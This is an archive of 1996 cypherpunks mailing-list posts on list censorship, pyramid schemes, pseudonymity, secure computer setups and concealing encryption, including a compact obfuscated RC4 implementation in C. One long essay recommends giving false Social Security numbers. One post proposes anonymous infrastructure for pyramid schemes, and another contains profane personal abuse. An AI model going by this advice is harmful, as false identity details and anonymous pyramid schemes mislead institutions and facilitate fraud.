Still, global anarcho-bands of mercenary bandits, hmm, what's that
411 for International Terrorist Gun Show -- er, military-industrial
showcases of megadeath?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 11:50:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: exclusion/censorship and the law (fwd)
In-Reply-To: <199611091936.NAA01142@einstein>
Message-ID: <oa17wD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@EINSTEIN.ssz.com> writes:
> How often it occurs is irrelevant, this is like saying one rape is not a
> crime but two is. Utter hogwash. Vulis was removed from the list, this
> means he can't SUBMIT posts.

I'm very grateful to Jim Choate for all his traffic in support of my freedom
of speech, but the above isn't quite right. So far I've been able to submit
posts and have them broadcast to the list. That doesn't mean that I'm welcome
to do that (I think John Gilmore made it perfectly clear that I'm not by
censoring me) but he hasn't technically prevented me from doing that.

John Gilmore has the right and the technical ability, but probably not the
balls to censor me further. He has no credibility to lose.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sun, 10 Nov 1996 15:10:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Pyramid Schemes
Message-ID: <19961110231024559.AAA112@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain



Pyramid schemes invalidate the worth of one's word. By gaining financially from one's recommendation said recommendation becomes of dubious trustworthiness. Traditionally, personal experience and anecdotes about products, goods and services have served as reputable guides in consumer culture. By gaining financially from one's word, one is cashing in their reputation. 


--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 14:10:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pyramid schemes and cryptoanarchy
In-Reply-To: <1.5.4.32.19961110162356.00a10f10@ix.netcom.com>
Message-ID: <Fc67wD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II <clay.olbon@dynetics.com> writes:

> It seems that pyramid scheme spamming has increased of late (if that is
> possible!).  In my lifetime, I can only remember a single snail-mail
> instance of a pyramid scheme - over the net it is an entirely different
> story (although the number of instances is probably proportional to the
> number of lists I subsribe to).

I once received a paper version of the Craig Shergold spam (i.e. a
solicitation of business cards to be sent to the dying boy without any
computer networks being involved) and became curious and looked into why
people spread these memes. It turned out that there's a substantial number
of people involved in marketing/public relations who sort of stay in touch
by forwarding these memes, good luck chain letters, multi-level marketing/
pyramid schemes etc to each other. The MMF spam we see on the net is a
vague echo of the MMF spam moving around USPS, with real cash. Fortunately
most folks involved in this have been too clueless to use the 'net or we'd
see a lot more of it. I suppose if it ever becomes cost-effective to use
digital cash and the Internet for MMF, they'll do it. Thus far putting
MMF on the 'net generally results in the loss of any accounts mentioned
in the spam, so getting cash via USPS is much more effective.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 10 Nov 1996 14:49:13 -0800 (PST)
To: Clay Olbon II <clay.olbon@dynetics.com>
Subject: Re: Pyramid schemes and cryptoanarchy
In-Reply-To: <1.5.4.32.19961110162356.00a10f10@ix.netcom.com>
Message-ID: <Pine.BSF.3.91.961110162701.1130A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Nov 1996, Clay Olbon II wrote:

> Pyramid schemes could be a growth market in a crypto-anarchic world.  It is
> yet another market such as gambling, or the lottery, that could be conducted
> with anonymity.  And it appears to be much more widespread on the internet

How is it like gambling? If I get a pyramid letter instructing me to send 
money to five people on the list, add my name to the bottom, send to 5 
people, or whatever, there's nothing stopping me from removing all the 
names, adding my name and those of four friends, and passing the letter 
along. With an anonymous system, I could easily be all five people, 
without even the bother of getting five different post office boxes.

There's no gambling involved; only blantant stupidity.

The "airplane" game was an interesting slant, though. Because of the 
in-person "airplane" parties, people were able to make contacts and 
network while participating. It was still the same old trick, but some 
may have found the ability to "buy" (and "sell") face time worth the price 
of admission (Some of the "airplane" games going around were to the tune 
of $2500, rather than the usual $5). Your anonymous slant on 
this removes the only economically viable excuse for participating, 
though - I don't even get to meet the head of the umptysquat dept. in 
return for getting fleeced.

The "airplane game" was big around Washington about a year ago, and
involved a number of highly placed people who aught to have been able to 
recognize a Ponzi scheme when it bit them in the ass. Makes me wonder how 
many people are stupid enough to "play" these games. 


-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Mon, 11 Nov 1996 00:09:44 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: a retort + a comment + a question = [RANT]
Message-ID: <199611110809.AAA06516@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 96 21:45:56 EST, SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:

>----------------------------------------------------------------------
>dave kinchlea wrote:
>>As said in "Hair" (the movie), "Don't do it for me man, 'cause 
>>if the shoe was on the other foot, I wouldn't do it for you!" 
>
>>It's a lie anyway, you do it for yourself.
>
>That's an _easy_ judgment to make (and i definitely have to stop 
>adding anecdotes from my life in these things!), but you missed the 
>point - the freedoms the Cpunks diligently try to preserve (or seem to 
>want to create...) are protected _by_ the military.  who was it that 
>said:       "law, without force, is impotent"  -?  

The military's sole purpose is to destroy things and kill people.
Freedom is protected by the poeple for the people some of which
are in the military.  The force is not nessasary to enforce laws in
most circumstances.  How many gun battles erupt at speed traps?  Granted,
there are instances where some force is required in arresting violent 
individuals, but it is still illeagal for the police to use ecessive
force.

>
>keep in mind that even "bad" laws have to be enforced.  you can scream 
>all you want about "good, strong" cryptostuffs, but if the phone lines 
>are slashed, the satellite links are down, the elcerticity is off and 
>you've got a foreign soldier waving a .45 around -  just how are you 
>going to boot up that pretty little computer and make it encode 
>information for you, much less get it anywhere?  anarchy implies 
>ruthlessness - you going to practice cryptostuffs from a prison cell?

You are wrong about bad laws being enforced.  Many laws are not enforeced
by the police.  Have you never been "let off" or "givin a warning" by the
police?  How many times have you seen people j walk in front of the police
who did nothing?

Computers are not nessasary to encode data, they just make it a lot
eaiser and faster.  Where did I put that secret decoder ring????


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 14:20:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pyramid Schemes
In-Reply-To: <v03007800aeabbd7e613b@[207.167.93.63]>
Message-ID: <Nw77wD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> I deleted the original spam, but from my brief glance at it, it may have
> been more of a multi-level marketing (MLM) scheme than a simple
> pyramid...something about selling mailing list services. And of course MLMs
> are mostly protected, else Amway, Herbalife, Avon, and all the other such
> MLMs would not survive.
>
> But I have a more radical view: pyramid schemes should not be illegal.

Surprisingly, I agree with Timmy on this one. MLM's/pyramid schemes fit
so well into the general American stupidity and the belief in getting
something for nothing.

> (And there are ways that cryptography allows "crypto-pyramids," though I
> doubt many crypto-savvy folks would participate.)

I think the following would be a worthwhile cypherpunks project: design the
anonymous infrastructure to allow those who wants to participate in MMF-like
pyramid schemes on the Internet to do so without bothering anyone.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 14:23:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mailing list liability (fwd)
In-Reply-To: <Pine.LNX.3.95.961110111103.404A-100000@gak.voicenet.com>
Message-ID: <q777wD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M." <markm@voicenet.com> writes:
> On Sat, 9 Nov 1996, Jim Choate wrote:
>
> > It is exactly editorial control because it prevents, a priori, submissions
> > Vulis under that account. He is FORCED to resort to other means. That is
> > what the courts will see, it is what the jury will see, and it is what will
> > eventualy sink the list, and place its operator under financial burden for
> > years.
>
> You really need to get your facts straight.  Vulis is _not_ prevented from
> posting under his name to cpunks.  He has in fact made several posts since
> he was removed from the list.

The fact remains that John Gilmore has "punished" me for speech that he didn't
like by unsubscribing me from both cypherpunks and coderpunks mailing lists and
by instructing majordomo to "play dead" in response to any requests from me.
That's rude; that's sneaky; that's censorship; that's John's right.

I am not a lawyer, but I hope that if and when someone gets sued over something
posted to this mailing list, John "deep pockets" Gilmore is named a codefendant
and is unable to convince anyone of his common carrier status.

(I remind the lawsuit-happy audience that John Gilmore was the fifth employee
of Sun Micro and was given some equity in the company, which after the IPO
became worth millions of dollars.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 10 Nov 1996 14:36:07 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: [IGNORE unless your name is Sandfort]
Message-ID: <Pine.SUN.3.94.961110173413.12339D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Mail to you currently bounces.

Is an alternative address available?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 10 Nov 1996 18:41:27 -0800 (PST)
To: "David K. Merriman" <merriman@amaonline.com>
Subject: Re: Rarity: Crypto question enclosed
In-Reply-To: <199611102102.NAA17006@toad.com>
Message-ID: <Pine.LNX.3.94.961110173427.5826D-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


Sounds a little like Hesiod to me.

cheers

On Sun, 10 Nov 1996, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> 
> To: cypherpunks@toad.com
> Date: Sun Nov 10 15:03:35 1996
> Sorry that this message doesn't include any flames, "outings", 
> denigrations, or other stuff......
> 
> My simple question is regarding key/certificate distribution:
> 
>         Is there any particular reason that such can't be accomplished via 
> on-line lists, and made available via a service on a port, using standard 
> (textual) commands, like mail and such are now?
> 
>         The things that come to mind are a 'client' request for a key, a 
> 'client' submission of a key, an external host requesting a key exchange, 
> and the host itself requesting a key exchange with another system (only 
> new/changed keys being swapped).
> 
>         The way I see it working is similar to (but not as slow as, or 
> requiring the human intervention) of the key servers already existing. 
> Granted that the first few such servers might carry a higher load, but I'd 
> think that would taper off as the (presumably free) software became 
> available, similar to the growth of remailer software (which would seem to 
> be a fairly reasonable relationship....).
> 
>         Hooks into existing PGP-fluent software shouldn't be difficult with 
> a standardized protocol, and I wouldn't think that the servers would be 
> that difficult to code and implement on a 'standard' (consistently used, 
> that is) port.
> 
>         I'm willing to have a try at the first server, if the parameters 
> can be defined.
> 
> Dave Merriman
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMoV+S8VrTvyYOzAZAQHlMQP/eU3F2JyaQcU6tQ+J5iCdAdPKiBNORJGT
> chgNauyaH/dHwj+DzcKZzhmjabsICGZjPbJvH+DIvnbGx3eGF1Y2HUAHvt5ab4ww
> gfPJ7xfjwNUJPyrTQtp7lXVdB5BVfSw/I2lHzSg1ssRvTo4iF+gIoAQypOT1Z617
> Fo/c1h77KgA=
> =pkk/
> -----END PGP SIGNATURE-----
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apache <apache@quux.apana.org.au>
Date: Sat, 9 Nov 1996 23:27:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: No More
In-Reply-To: <2.2.32.19961108235312.00681fcc@cnct.com>
Message-ID: <Pine.LNX.3.91.961110180223.12690B-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, YoungSik Jeong wrote:

> I want take off mail list

Proceed to launch pad three






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 22:27:03 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Legal Deffinition of Encryption?
In-Reply-To: <v02140b02aeaba1c8961f@[192.0.2.1]>
Message-ID: <32868CDB.7473@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> At 2:17 PM 11/9/1996, Mark M. wrote:
> >On Sat, 9 Nov 1996, Benjamin Grosman wrote:
> >> I have absolutely no idea: this is a very interesting problem. Not for just
> >> compression and encryption differention legally, but also, well, ANY other
> >> data form. If one defines a new format for saving data (i.e a new image
> >> format), and then exports this technology from the USA, is this exportation
> >> of munitions due to it's unknown qualities? Or what?

> > I can't define encryption, but I know it when I see it.

> They way it will be forbidden is by outlawing the execution of the
> algorithms.  The algorithms (the secure ones anyway) are well defined
> as is executing them.  The legal system has dealt with greater
> ambiguities than this.
> An analogy to the drug laws might be useful.  We don't outlaw all drugs
> that cause you to have weird visions and to act strangely.  That would
> be hard to define and would cover a number of legal drugs.
> Instead, the specific chemicals are forbidden as they are discovered.

I can see how the chemical/drug thing works, and I can see how they can
easily control Public Key (PGP) encryption, but if you are suggesting
that they can effectively eradicate private key encryption, that would
seem to be an impossibility.

BTW, if the current Public Key program(s) were prohibited, wouldn't new
versions using different schemes pop up everywhere?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Sat, 9 Nov 1996 23:58:26 -0800 (PST)
To: markets@mindspring.com
Subject: Pyramid Schemes
Message-ID: <2.2.32.19961111045417.00967cb0@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,

Aren't these Pyramid Schemes Illegal?

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tom bryce <tjb@acpub.duke.edu>
Date: Sun, 10 Nov 1996 16:07:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <3.0.32.19961110111720.00e2eeec@mail.eskimo.com>
Message-ID: <l03010608aeabd76ba639@[152.3.87.2]>
MIME-Version: 1.0
Content-Type: text/plain


>See the CryptoBook link at http://www.eskimo.com/~joelm
>
>While the concepts were originally developed for a laptop, they're easily
>applied to a desktop machine running Win95.
>
>Joel

Thanks for the link to the CryptoBook stuff - it's useful info.

Could you address further the issue of plaintext from scratch files,
virtual memory, and so on, from the standpoint of your CryptoBook system?

The advice to make the temporary directory on the encrypted volume and so
on, and the general pointer to wipe utilities, is good, but is there a
systematic way of making sure *no* plaintext gets written to disk, or if it
gets written, that it is properly wiped, with this system?

I believe there is a utility for DOS to intercept calls to delete (I'm a
mac person, pardon if I'm getting this wrong) and wipe all files before
deletion. (Real Delete? Secure Delete?) Would this be compatible with
Win95/cryptobook, and if so, would this address virtual memory concerns?

The larger question I'm wondering about here is, if one were starting from
scratch and trying to build a maximally secure Mac/Dos/Windows/Unix/other
platform for oneself to do one's daily work, which machine and what
configuration would one want? The mac I configured earlier seems pretty
darn good, can anyone see a flaw in it? I think the pain in the neck
resulting from the write-protected startup volume could be problematic, but
aliases to writeable files/folders on the encrypted partition should solve
most of this. I may set this up on my own mac to test it out, when I have
some time.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 16:51:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <m0vMadi-0001QGC@wittsend.com>
Message-ID: <16D8wD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Michael H. Warfield" <mhw@wittsend.com> writes:
>
> Dr.Dimitri Vulis KOTM enscribed thusly:
> >
> > Hayashi_Tsuyoshi <take@barrier-free.co.jp> writes:
> >
> > > On Sat, 09 Nov 1996 10:47:28 -0800, stewarts@ix.netcom.com said:
> > >  >At 01:29 AM 11/9/96 -0800, John Gilmore <gnu@toad.com> wrote:
> > >  >>ask questions, etc.  To join the list, send mail to:
> > >  >>	linux-ipsec-REQUEST@clinet.fi
> > >  >>The email should contain a single line that just says:
> > >  >>	subscribe
> > >  >
> > >  >Actually, it needs to say
> > >  >        subscribe linux-ipsec
> > >
> > > Probably, it needs to send mail to:
> > > 	Majordomo@clinet.fi
> > >
> > > ///hayashi
> >
> > Moral: John Gilmore can't be trusted.
>
> Moral:	No wonder you get your ass thrown off mailing lists.  You're a fucking
> 	jerk who seems incapable of making and intelligent or constructive
> 	contribution to a discussion.
>
> 	We're working on something serious here and trying to cooperate and
> help each other.  All you can find to do is jump in and make an ass of
> yourself.  Since you're such a stupid ignoramous, I'll point out that the
> instructions which John posted agree with the messages coming from Tatu's
> system.  They just didn't work.  So, Tatu has something misconfigured on
> his system.  But I suppose you couldn't be BOTHERED to even fucking check.
>
> 	You own John an apology but I think that's a bit much to expect
> from low life like yourself.

Yeah, right. Be sure to ask Paul Bradley to implement his brute force
attack on one-time pads. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 10 Nov 1996 16:39:35 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611092052.UAA00391@server.test.net>
Message-ID: <Pine.SUN.3.94.961110173517.12339E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Nov 1996, Adam Back wrote:

> S L von Bernhardt == Black Unicorn, or do you "have that covered" too uni?
> 
> (I noticed you said you "had it covered" when you reported to the list
> on a meeting you attended which had a published list of attenders, and
> someone pointed this out).

I'm not sure which meeting this would be.  If I was on any published list
it would be under a pseudonym or a large and diverse enough list where I
didn't feel threatened by it being public.  Generally these are meetings I
attend only for personal or academic interest.  (i.e. I'm not attending in
an official capacity or participating in a way which would make my
presence obvious or a matter of record).

I suppose you could be referring to the ABA Committee on Law and National
Security Conference on Intelligence and Law Enforcement in September.
That's the most recent meeting I can recall which might fit your
description.

If my attendence to that event was published by anyone other than myself I
am unaware of it.  Even if it were I doubt it would be of value in linking
me to a "true name."

But this brings up some interesting points, and, with your patience, I
think I will take this time to blather on.


Secrecy - A few words (or more).

Secrecy is all about vigilance.  If you never put your name on something,
your name is unlikely to come up.  I fail to understand why this is, it
would seem, such a difficult concept for some cypherpunks to grasp.  If
everyone treated true names like PGP passwords and added in a touch of
disinformation here and there where required, true names would be nearly
impossible to determine.  To my knowledge few have bothered on this list.
I find this unfortunate.  In my personal experience it is quite easy to
conceal one's identity, particularly so where personal and professional
circles differ significantly, as they do in my case.

I admit that I am advantaged in that I was born outside the United States
and come from a family jealous of its privacy to begin with, but I submit
that secrecy of the kind I have (it would seem) preserved is not that
difficult to estlablish, and maintain.

I originally adopted a nym because I was concerned that my public
statements on the list and elsewhere in cyberspace, (which have nothing
to do with my professional conduct, my ability to represent clients or
wear my fiducuary hat) might be taken out of context and prejudice clients
or shareholders in one fashion or another.  Cypherpunks, and my politics
generally, are not always conducive to the traditional conservative
dispositions my clients and my family often had.  I was tangentially
concerned about some pre-publication review issues, which have since
evaporated.  As time went on it became clear that a nym was useful in
other ways.

For one, because I chose a depiction "Black Unicorn," rather than a name
"John Smith," I found that those who eventually contacted me by e-mail had
first to overcome the "silliness" reaction.  Seems rather moronic to write
an adolescent sounding "handle" about financial advice and so forth.  A
pre-screener of sorts.  The inquries I received were from individuals
interested or driven enough to ignore the cartoonish pen name as a result.
A decided advantage in my view.

A disadvantage: When I adopted the nym, I had not planned it to last quite
so long.  The image was perhaps a bit too personal to deter close and
determined investigations from revealing my identity, or at least come
close. (As one cypherpunk- I think you know who you are, though I'm not
sure- did).

Secondly, the potential for malicious reputation destruction was reduced
dramatically.  Its hard to call my clients and anonymously reveal my
"heroin problem" or some such.  Given the heated flames I am alarmingly
prone to participate in, this was something of a comfort.  I don't think I
ever abused my secrecy to avoid accountability for any real nastiness on
my part, though perhaps the list would be a better judge of that.

Thirdly, it became clear that given the amount and degree of archiving
which developed on the net, I was protected from the notorious "sleeper
blooper" attack.  "Do you recognize this, a posting from 1897, in which
you said that abortion should be legalized?"  This affords nice protection
from the sudden change in conventional wisdom on all the topics I
discussed.  (The flip side is that if banking secrecy ever comes back in
vogue, I need only reveal myself by signing my key to something with my
name on it and take credit for being a maverick in my time, or whatever).
This is a point that bears exploration.  The ability to pull up a literal
rap sheet on a person is no longer confined to law enforcement (as
our KOTM profiler so aptly demonstrated only days ago).  It is now an
easy endeavor which private investigation services once charged $65.00/hr
or more to accomplish.  Your's for only the cost of a local call.

Yet at the same time few seem to have bothered to pursue research on my
nym.  I paid for early accounts in cash or with a cutout credit
card, eventually using a provider I had substantial control over instead.  
I monitored things as simple as calls to my access provider, whois
commands (try whois.ripe.net), finger requests, etc.  To my surprise,
these were few in number.  I think people generally were uninterested, and
those who were either got bored or distracted.

Fourthly, the nym lent some protection from the baseless law suit.  No
longer is it in the power of just anyone to cost me time and money simply
because they wish to.  If I really engage in some conduct which causes
serious harm, and the potential for returns are high enough, resources
will doubtlessly be allocated to identify me and name me in a suit.  If
this cost is high enough, however, nuisance suits become hard to initiate
effectively.  An important point given all the discussion on the list
about the wisdom of legal threats for libel.

I think that the usual cypherpunk solution, if such a thing exists, would
be to use technical means to deter law suits, yet many in here resort to
attacks on those who would use the system instead.  Hasn't this been the
cypherpunk experience, that prosecutorial discression is no protection?
Why is libel any different?  Given that civil suits put the private party 
in the place of prosecutor, and that party has less of an incentive to
practice discression in initiating suit (no political checks, no
supervisory authoirty or chain of command) it would seem that civil suits 
bear a HIGHER risk of abuse.  Yet government, which like it or not has
several checks built in that the civil system does not, gets the most
attention in this regard.  A point to consider anyhow.

What were the biggest problems?  Family.

A pair of c'punks managed, by coincidence in one case, design in the
other, to collide with my sister on the net.  As she had a full and rather
open web page up and this had the potential to give out a plethora of
clues.  Nothing too personal, (thanks sis) but I was unaware the page
existed for quite awhile.  Again, I believe that it was a cultrual thing
which prevented her from spilling all her life's details and our family
name out onto the web like some kind of billboard.  (All it takes is a
quick look at something like "babes on the web" or whatever to find quite
well designed stalker's cliff notes happily authored by the stalkee.  One
page  I saw recently had a resume with social security number on it).

Cultural issues...

The problem with the United States is the complete integration of identity
publication into the development process.  Cub scout fingerprintings, year
book photographs, medical records, social security numbers at birth, the
list continues.  As numerous as these subtle and progressive degradations
of secrecy are, they are still not insurmountable for the United States
citizen.  No more than 4 or 5 absences on key dates would be required to
remove any individual from high school year books.  Complying with the
letter of the law, and no more, with regard to Social Security Number
disclosures is simple.  (Simply never write it down- or at least not
correctly- the people who need it, have it).  I have lived on and off in
the United States for quite some years, and I have never encountered a
situation where an actual social security number would have been required
of me.  I have shot myself in the foot by refusing to give on rather
than making one up, but this is a side issue.  Two associates of mine have
had similar experience. One (29) has no number at all and never bothered
to get one (last I heard, he was working in a high paying corporate type
job in a major city on the East Coast).  The other (38) has a number but
can no longer remember what it is.  (25+ years of disuse).  I assume that
whenever asked, they simply provide erronious or misleading information.
Both are U.S. citizens.

Unfortunately, in the United States most citizens only become interested
in privacy in their 20s or so.  By this time it is difficult to overcome
the mass of information which has been stored up.  (Pseudocide can be an
attractive option for some perhaps).

One marvels at the inability of Joe Sixpack to recognize the value of at
least a hint of caution with regard to identity.  (Especially so given all
the media hype about the dangers of social engineering, account number and
social security number publication and license plate information).

Given the cultural elements, I suppose it shouldn't be surprising to me
that any disclosure about a nym seems to bring with it a thousand clever
investigators who are sure that they have just managed to happen on a
"slip up."  (No less than four postings of this nature followed the DCSB
announcement).  For some reason, however, I still can't help but wonder
that secrecy seems so alien even to noted members of this list.  (Chrysler
kept its complete control over Norex N.A. a secret for 10 years, despite
the fact that millions flowed between the two companies regularly.  Crazy
Eddie, of New York fame, managed to keep his assets hidden, under the most
immense pressure, and his identity concealed for several years despite all
attempts by the United States to find him.  Saddam managed to avoid bombs
and cruise missles even in the face of satelite and directed intelligence
tasking.  Given these, keeping your name away from the Health Insurance
company should be quite obviously possible).

Apathy....

There are a few people out there who probably know who I am, but I'm not
sure that even they realize it exactly.  In terms of money I've not even
put much effort into it over the years, at least no more so than I do
protecting my personal privacy generally.  Part of the reason is that it
takes effort to research this kind of thing.  Even access to Lexis/Nexis
isn't always enough if you're given nothing to go on from the start.
Sure, there are schelling (?) points and so forth.  Certain lifestyle
habits come through.  (One list member who I spoke with by
telephone regularly derived a great deal simply from my phoning habits-
you know who you are- Kudos).  Even all this together, however, is not
always enough to narrow down the field too closely.

Keep in mind that I've attended cypherpunk meetings and met personally
with no less than 3 c'punks in the last several years.

My point?  That I'm immensely clever and trained in the shadowy world of
secret identities?  Hardly.  My point is that minimal effort can be
extremely effective.  In effect, anyone can do it.

I'm sure some clever participant at DCSB will do a pile of homework before
coming to my talk and put it all together.  So be it.  If he or she is
polite, they might chide me in private a bit, but not blather all over the
list just to show how very clever they were.  As long as they enjoy the
talk, I'm not overly concerned.

I do less work for private clients who's sensibilities I'm particularly
concerned about.  I spend more and more time out of the United States,
and, frankly, cypherpunks in general have received me warmly.  Most large
posts I made attracted at least a few "thank you's" or "could you tell me
more's."  In many ways this was much more rewarding than work for which
renumeration was forthcoming.  I hope I've given something back.

This brings up my final point.  Reputation.

After a while with the nym, the value of reputation became clear.  A
"cartoon" handle required more than the usual amount of reputation and I
found myself often taking more time with long posts and list research
projects than I might of had my real name been attached. (!)  Reputation
has value in more than one way it would seem.

Whatever comes of my visit to Boston, and snide remarks about my "teasers"
aside, I've enjoyed cypherpunks, even with the noise, and hope I can
continue to do so for as many years to come.  While less important,
today, privacy is still an issue for me.  Do be considerate and refrain
from taking photos and the like just for kicks.  I'm hardly going to be
obnoxious enough to have everyone frisked as the enter or the like, do me
a favor and make my guess that such measures are unnecessary among
cypherpunks the correct one.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 10 Nov 1996 14:34:35 -0800 (PST)
To: ph@netcom.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b02aeaa6d2cfe8f@[192.0.2.1]>
Message-ID: <199611102034.UAA00143@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Hendrickson <ph@netcom.com> writes:
> At 3:30 AM 11/9/1996, Adam Back wrote:
> >Peter Hendrickson <ph@netcom.com> writes:
> >> Where will you keep your secret key?  Remember, when they go through
> >> your house they bring 20 young graduates from MIT who are just dying
> >> to show how clever they are and save the world at the same time.
> 
> > Keep your secret key in your head.
> 
> I think this is hard to do in practice.  I have tried.

You could probably keep a hashing function around plausibly, then you
could do as usual and remember the passphrase and use the hash
function to construct the actual key.

> > Your plausible deniability has to get quite low before it will stand
> > up as "proof" in court.
> 
> My idea is that the lack of noise is used as evidence to get a search
> warrant.  The search warrant is used to get the evidence to put you away
> forever.

Your plausible deniability has to drop below 100%, your data has
deviate from "indistinguishable from normal data distributions" to get
yourself investigated in the first place.

If your stego techniques are any good, the feds will never get beyond
that point.  They will then be left with the option of doing random
`spot-checks'.  Having been on the cypherpunks list probably would
increase your chances of having your system checked.

> > Your real challenge is keeping your stego programs safe.  Boot
> > strapping a stegoed encrypted file system while leaving no stego code
> > lying around isn't that easy.
> 
> Excellent point, especially since you don't have an encrypted virtual
> disk.  Can anybody resolve this?
> 
> > rc4 in C:
> >
> > #define S,t=s[i],s[i]=s[j],s[j]=t /* rc4 key <file */
> > unsigned char s[256],i,j,t;main(c,v)char**v;{++v;while
> > (s[++i]=i);while(j+=s[i]+(*v)[i%strlen(*v)]S,++i);for(
> > j=0;c=~getchar();putchar(~c^s[t+=s[i]]))j+=s[++i]S;}
> 
> (Under 3.3)  I would have a hard time memorizing these programs.  This
> pretty much guarantees that the number of cryptoanarchists will be small.

That program is optimised for size rather than ease of memorizing.

RC4 is an elegantly simple algorithm, and I sumbit that you could
remember it.  Barring that you could just leave around a few
cypherpunks archives, or sci.crypt archives or whatever, and cut and
paste it form one of my posts :-)

Because RC4 is a stream cipher, you shouldn't reuse the key.  However
you shouldn't need to for this application.  You just use it to boot-
strap the real code.

You'd need to put in the appropriate stego decoder (say getting the
